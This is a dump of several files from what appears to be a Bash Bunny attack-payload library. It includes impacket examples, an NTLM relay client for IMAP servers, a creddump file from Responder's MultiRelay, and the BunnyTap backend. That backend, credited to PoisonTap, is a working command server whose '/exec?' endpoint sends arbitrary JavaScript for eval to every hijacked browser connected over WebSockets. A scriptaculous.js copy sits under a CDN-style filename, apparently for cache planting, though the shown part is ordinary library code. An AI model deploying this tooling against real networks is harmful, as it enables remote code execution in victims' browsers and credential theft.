57 | while 1: 58 | # Give the ICMP packet the next ID in the sequence. 59 | seq_id += 1 60 | icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload) 61 | 62 | # Have the IP packet contain the ICMP packet (along with its payload). 63 | ip.contains(icmp) 64 | ip.set_next_header(ip.child().get_ip_protocol_number()) 65 | ip.set_payload_length(ip.child().get_size()) 66 | icmp.calculate_checksum() 67 | 68 | # Send it to the target host. 69 | s.sendto(icmp.get_packet(), (dst, 0)) 70 | 71 | # Wait for incoming replies. 72 | if s in select.select([s],[],[],1)[0]: 73 | reply = s.recvfrom(2000)[0] 74 | 75 | # Use ImpactDecoder to reconstruct the packet hierarchy. 76 | rip = ImpactDecoder.ICMP6Decoder().decode(reply) 77 | 78 | # If the packet matches, report it to the user. 79 | if ICMP6.ICMP6.ECHO_REPLY == rip.get_type(): 80 | print "%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4,dst,rip.get_echo_sequence_number()) 81 | 82 | time.sleep(1) 83 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_Dot11Decoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactDecoder import Dot11Decoder #,Dot11Types 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11Decoder(unittest.TestCase): 12 | 13 | def setUp(self): 14 | self.WEPKey=None #Unknown 15 | self.WEPData='\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35' 16 | dot11_decoder = Dot11Decoder() 17 | self.in0=dot11_decoder.decode(self.WEPData) 18 | self.in1=self.in0.child() 19 | self.in2=self.in1.child() 20 | self.in3=self.in2.child() 21 | if self.WEPKey: 22 | self.in4=self.in3.child() 23 | self.in5=self.in4.child() 24 | 25 | def test_01_Dot11Decoder(self): 26 | 'Test Dot11 decoder' 27 | self.assertEqual(str(self.in0.__class__), "dot11.Dot11") 28 | 29 | def test_02_Dot11DataFrameDecoder(self): 30 | 'Test Dot11DataFrame decoder' 31 | self.assertEqual(str(self.in1.__class__), "dot11.Dot11DataFrame") 32 | 33 | def test_03_Dot11WEP(self): 34 | 'Test Dot11WEP decoder' 35 | self.assertEqual(str(self.in2.__class__), "dot11.Dot11WEP") 36 | 37 | def test_04_Dot11WEPData(self): 38 | 'Test Dot11WEPData decoder' 39 | 40 | if not self.WEPKey: 41 | return 42 | 43 | self.assertEqual(str(self.in3.__class__), "dot11.Dot11WEPData") 44 | 45 | # Test if wep data "get_packet" is correct 46 | wepdata='\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17' 47 | self.assertEqual(self.in3.get_packet(),wepdata) 48 | 49 | def test_05_LLC(self): 50 | 'Test LLC decoder' 51 | if self.WEPKey: 52 | self.assertEqual(str(self.in4.__class__), "dot11.LLC") 53 | 54 | def test_06_Data(self): 55 | 'Test LLC Data decoder' 56 | 57 | if self.WEPKey: 58 | dataclass=self.in4.__class__ 59 | else: 60 | dataclass=self.in3.__class__ 61 | 62 | self.assertTrue(str(dataclass).find('ImpactPacket.Data') > 0) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11Decoder) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/types.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | regtypes = { 23 | '_CM_KEY_VALUE' : [ 0x18, { 24 | 'Signature' : [ 0x0, ['unsigned short']], 25 | 'NameLength' : [ 0x2, ['unsigned short']], 26 | 'DataLength' : [ 0x4, ['unsigned long']], 27 | 'Data' : [ 0x8, ['unsigned long']], 28 | 'Type' : [ 0xc, ['unsigned long']], 29 | 'Flags' : [ 0x10, ['unsigned short']], 30 | 'Spare' : [ 0x12, ['unsigned short']], 31 | 'Name' : [ 0x14, ['array', 1, ['unsigned short']]], 32 | } ], 33 | '_CM_KEY_NODE' : [ 0x50, { 34 | 'Signature' : [ 0x0, ['unsigned short']], 35 | 'Flags' : [ 0x2, ['unsigned short']], 36 | 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']], 37 | 'Spare' : [ 0xc, ['unsigned long']], 38 | 'Parent' : [ 0x10, ['unsigned long']], 39 | 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]], 40 | 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]], 41 | 'ValueList' : [ 0x24, ['_CHILD_LIST']], 42 | 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']], 43 | 'Security' : [ 0x2c, ['unsigned long']], 44 | 'Class' : [ 0x30, ['unsigned long']], 45 | 'MaxNameLen' : [ 0x34, ['unsigned long']], 46 | 'MaxClassLen' : [ 0x38, ['unsigned long']], 47 | 'MaxValueNameLen' : [ 0x3c, ['unsigned long']], 48 | 'MaxValueDataLen' : [ 0x40, ['unsigned long']], 49 | 'WorkVar' : [ 0x44, ['unsigned long']], 50 | 'NameLength' : [ 0x48, ['unsigned short']], 51 | 'ClassLength' : [ 0x4a, ['unsigned short']], 52 | 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]], 53 | } ], 54 | '_CM_KEY_INDEX' : [ 0x8, { 55 | 'Signature' : [ 0x0, ['unsigned short']], 56 | 'Count' : [ 0x2, ['unsigned short']], 57 | 'List' : [ 0x4, ['array', 1, ['unsigned long']]], 58 | } ], 59 | '_CHILD_LIST' : [ 0x8, { 60 | 'Count' : [ 0x0, ['unsigned long']], 61 | 'List' : [ 0x4, ['unsigned long']], 62 | } ], 63 | } 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/smbserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple SMB Server example. 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | 14 | import sys 15 | import argparse 16 | import logging 17 | 18 | from impacket.examples import logger 19 | from impacket import smbserver, version 20 | 21 | if __name__ == '__main__': 22 | 23 | # Init the example's logger theme 24 | logger.init() 25 | print version.BANNER 26 | 27 | parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a " 28 | "share specified as an argument. You need to be root in order to bind to port 445. " 29 | "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP " 30 | "/tmp") 31 | 32 | parser.add_argument('shareName', action='store', help='name of the share to add') 33 | parser.add_argument('sharePath', action='store', help='path of the share to add') 34 | parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares') 35 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 36 | parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') 37 | 38 | if len(sys.argv)==1: 39 | parser.print_help() 40 | sys.exit(1) 41 | 42 | try: 43 | options = parser.parse_args() 44 | except Exception, e: 45 | logging.critical(str(e)) 46 | sys.exit(1) 47 | 48 | if options.debug is True: 49 | logging.getLogger().setLevel(logging.DEBUG) 50 | else: 51 | logging.getLogger().setLevel(logging.INFO) 52 | 53 | if options.comment is None: 54 | comment = '' 55 | else: 56 | comment = options.comment 57 | 58 | server = smbserver.SimpleSMBServer() 59 | 60 | server.addShare(options.shareName.upper(), options.sharePath, comment) 61 | server.setSMB2Support(options.smb2support) 62 | 63 | # Here you can set a custom SMB challenge in hex format 64 | # If empty defaults to '4141414141414141' 65 | # (remember: must be 16 hex bytes long) 66 | # e.g. server.setSMBChallenge('12345678abcdef00') 67 | server.setSMBChallenge('') 68 | 69 | # If you don't want log to stdout, comment the following line 70 | # If you want log dumped to a file, enter the filename 71 | server.setLogFile('') 72 | 73 | # Rock and roll 74 | server.start() 75 | 76 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Author: 9 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 10 | # 11 | # Description: 12 | # IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange 13 | # 14 | import logging 15 | import imaplib 16 | import base64 17 | 18 | class IMAPRelayClient: 19 | def __init__(self, target): 20 | # Target comes as protocol://target:port 21 | self.target = target 22 | proto, host, port = target.split(':') 23 | host = host[2:] 24 | if int(port) == 993 or proto.upper() == 'IMAPS': 25 | self.session = imaplib.IMAP4_SSL(host,int(port)) 26 | else: 27 | #assume non-ssl IMAP 28 | self.session = imaplib.IMAP4(host,port) 29 | if 'AUTH=NTLM' not in self.session.capabilities: 30 | logging.error('IMAP server does not support NTLM authentication!') 31 | return False 32 | self.authtag = self.session._new_tag() 33 | self.lastresult = None 34 | 35 | def sendNegotiate(self,negotiateMessage): 36 | #Negotiate auth 37 | negotiate = base64.b64encode(negotiateMessage) 38 | self.session.send('%s AUTHENTICATE NTLM%s' % (self.authtag,imaplib.CRLF)) 39 | resp = self.session.readline().strip() 40 | if resp != '+': 41 | logging.error('IMAP Client error, expected continuation (+), got %s ' % resp) 42 | return False 43 | else: 44 | self.session.send(negotiate + imaplib.CRLF) 45 | try: 46 | serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char 47 | serverChallenge = base64.b64decode(serverChallengeBase64) 48 | return serverChallenge 49 | except (IndexError, KeyError, AttributeError): 50 | logging.error('No NTLM challenge returned from IMAP server') 51 | 52 | def sendAuth(self,authenticateMessageBlob, serverChallenge=None): 53 | #Send auth 54 | auth = base64.b64encode(authenticateMessageBlob) 55 | self.session.send(auth + imaplib.CRLF) 56 | typ, data = self.session._get_tagged_response(self.authtag) 57 | if typ == 'OK': 58 | self.session.state = 'AUTH' 59 | return True 60 | else: 61 | logging.info('Auth failed - IMAP server said: %s' % ' '.join(data)) 62 | return False 63 | 64 | #SMB Relay server needs this 65 | @staticmethod 66 | def get_encryption_key(): 67 | return None -------------------------------------------------------------------------------- /payloads/library/BunnyTap/backend_server.js: -------------------------------------------------------------------------------- 1 | // PoisonTap by Samy Kamkar - https://samy.pl/poisontap 2 | 3 | //var _ = require('underscore') 4 | var WebSocketServer = require('websocket').server 5 | var webSocketsServerPort = 1337 6 | var http = require('http') 7 | var conns = [] 8 | var gr 9 | var server = http.createServer((request, response) => { 10 | console.log((new Date()) + ' HTTP server. URL ' + request.url + ' requested.') 11 | 12 | if (request.url.indexOf('/exec?') === 0) 13 | { 14 | response.writeHead(404, {'Content-Type': 'text/html'}) 15 | for (var i in conns) 16 | conns[i].sendUTF(JSON.stringify({ request: 'eval', content: request.url.substr(6) })) 17 | response.end("sent") 18 | } 19 | else if (request.url.indexOf('/send?') === 0) 20 | { 21 | response.writeHead(404, {'Content-Type': 'text/html'}) 22 | for (var i in conns) 23 | conns[i].sendUTF('{"' + decodeURI(request.url.substr(6)).replace(/"/g, '\\"').replace(/&/g, '","').replace(/=/g,'":"') + '"}') 24 | var checkgr = () => 25 | { 26 | if (gr) 27 | { 28 | response.end(gr) 29 | gr = "" 30 | } 31 | else 32 | setTimeout(checkgr, 500) 33 | } 34 | checkgr() 35 | } 36 | else if (request.url === '/status') 37 | { 38 | response.writeHead(200, {'Content-Type': 'application/json'}) 39 | var responseObject = { 40 | currentClients: 1234, 41 | totalHistory: 567 42 | } 43 | response.end(JSON.stringify(responseObject)) 44 | } 45 | else { 46 | response.writeHead(404, {'Content-Type': 'text/html'}) 47 | response.end('Sorry, unknown url') 48 | } 49 | }) 50 | server.listen(webSocketsServerPort, () => { 51 | console.log((new Date()) + " Server is listening on port " + webSocketsServerPort) 52 | }) 53 | 54 | // create the server 55 | wsServer = new WebSocketServer({ 56 | httpServer: server 57 | }) 58 | 59 | function handleReq(obj, con) 60 | { 61 | if (obj.request === 'getresponse') 62 | gr = obj.html 63 | } 64 | 65 | wsServer.on('request', (request) => { 66 | var obj 67 | var connection = request.accept(null, request.origin) 68 | conns.push(connection) 69 | 70 | connection.on('request', (message) => { 71 | console.log('request: ' + message) 72 | }) 73 | 74 | connection.on('message', (message) => { 75 | try { obj = JSON.parse(message.utf8Data) } catch(e) { } 76 | console.log('message: ' + message.utf8Data) 77 | console.log(obj) 78 | 79 | if (typeof(obj) === 'object') 80 | handleReq(obj, connection) 81 | else 82 | connection.sendUTF('hello') 83 | }) 84 | 85 | // remove connection from our list 86 | connection.on('close', connection => { 87 | console.log('connection closed') 88 | for (var i in conns) 89 | if (conns[i] == connection) 90 | //if (_.isEqual(conns[i], connection)) // XXX 91 | conn.splice(i, 1) 92 | }) 93 | }) 94 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/uuid.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt. 9 | # A different, much simpler (not necessarily better) algorithm is used. 10 | # 11 | # Author: 12 | # Javier Kohen (jkohen) 13 | # 14 | 15 | import re 16 | 17 | from random import randrange 18 | from struct import pack, unpack 19 | 20 | def generate(): 21 | # UHm... crappy Python has an maximum integer of 2**31-1. 22 | top = (1L<<31)-1 23 | return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top)) 24 | 25 | def bin_to_string(uuid): 26 | uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16]) 28 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) 29 | 30 | def string_to_bin(uuid): 31 | matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid) 32 | (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = map(lambda x: long(x, 16), matches.groups()) 33 | uuid = pack('HHL', uuid4, uuid5, uuid6) 35 | return uuid 36 | 37 | def stringver_to_bin(s): 38 | (maj,min) = s.split('.') 39 | return pack(' 20 | # Javier Kohen 21 | # 22 | # Reference for: 23 | # ImpactPacket: IP, ICMP, DATA. 24 | # ImpactDecoder. 25 | 26 | import select 27 | import socket 28 | import time 29 | import sys 30 | 31 | from impacket import ImpactDecoder, ImpactPacket 32 | 33 | if len(sys.argv) < 3: 34 | print "Use: %s " % sys.argv[0] 35 | sys.exit(1) 36 | 37 | src = sys.argv[1] 38 | dst = sys.argv[2] 39 | 40 | # Create a new IP packet and set its source and destination addresses. 41 | 42 | ip = ImpactPacket.IP() 43 | ip.set_ip_src(src) 44 | ip.set_ip_dst(dst) 45 | 46 | # Create a new ICMP packet of type ECHO. 47 | 48 | icmp = ImpactPacket.ICMP() 49 | icmp.set_icmp_type(icmp.ICMP_ECHO) 50 | 51 | # Include a 156-character long payload inside the ICMP packet. 52 | icmp.contains(ImpactPacket.Data("A"*156)) 53 | 54 | # Have the IP packet contain the ICMP packet (along with its payload). 55 | ip.contains(icmp) 56 | 57 | # Open a raw socket. Special permissions are usually required. 58 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) 59 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 60 | 61 | seq_id = 0 62 | while 1: 63 | # Give the ICMP packet the next ID in the sequence. 64 | seq_id += 1 65 | icmp.set_icmp_id(seq_id) 66 | 67 | # Calculate its checksum. 68 | icmp.set_icmp_cksum(0) 69 | icmp.auto_checksum = 1 70 | 71 | # Send it to the target host. 72 | s.sendto(ip.get_packet(), (dst, 0)) 73 | 74 | # Wait for incoming replies. 75 | if s in select.select([s],[],[],1)[0]: 76 | reply = s.recvfrom(2000)[0] 77 | 78 | # Use ImpactDecoder to reconstruct the packet hierarchy. 79 | rip = ImpactDecoder.IPDecoder().decode(reply) 80 | # Extract the ICMP packet from its container (the IP packet). 81 | ricmp = rip.child() 82 | 83 | # If the packet matches, report it to the user. 84 | if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type(): 85 | print "Ping reply for sequence #%d" % ricmp.get_icmp_id() 86 | 87 | time.sleep(1) 88 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js: -------------------------------------------------------------------------------- 1 | // script.aculo.us scriptaculous.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 2 | 3 | // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) 4 | // 5 | // Permission is hereby granted, free of charge, to any person obtaining 6 | // a copy of this software and associated documentation files (the 7 | // "Software"), to deal in the Software without restriction, including 8 | // without limitation the rights to use, copy, modify, merge, publish, 9 | // distribute, sublicense, and/or sell copies of the Software, and to 10 | // permit persons to whom the Software is furnished to do so, subject to 11 | // the following conditions: 12 | // 13 | // The above copyright notice and this permission notice shall be 14 | // included in all copies or substantial portions of the Software. 15 | // 16 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 19 | // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 20 | // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 21 | // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 22 | // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 23 | // 24 | // For details, see the script.aculo.us web site: http://script.aculo.us/ 25 | 26 | var Scriptaculous = { 27 | Version: '1.8.1', 28 | require: function(libraryName) { 29 | // inserting via DOM fails in Safari 2.0, so brute force approach 30 | document.write('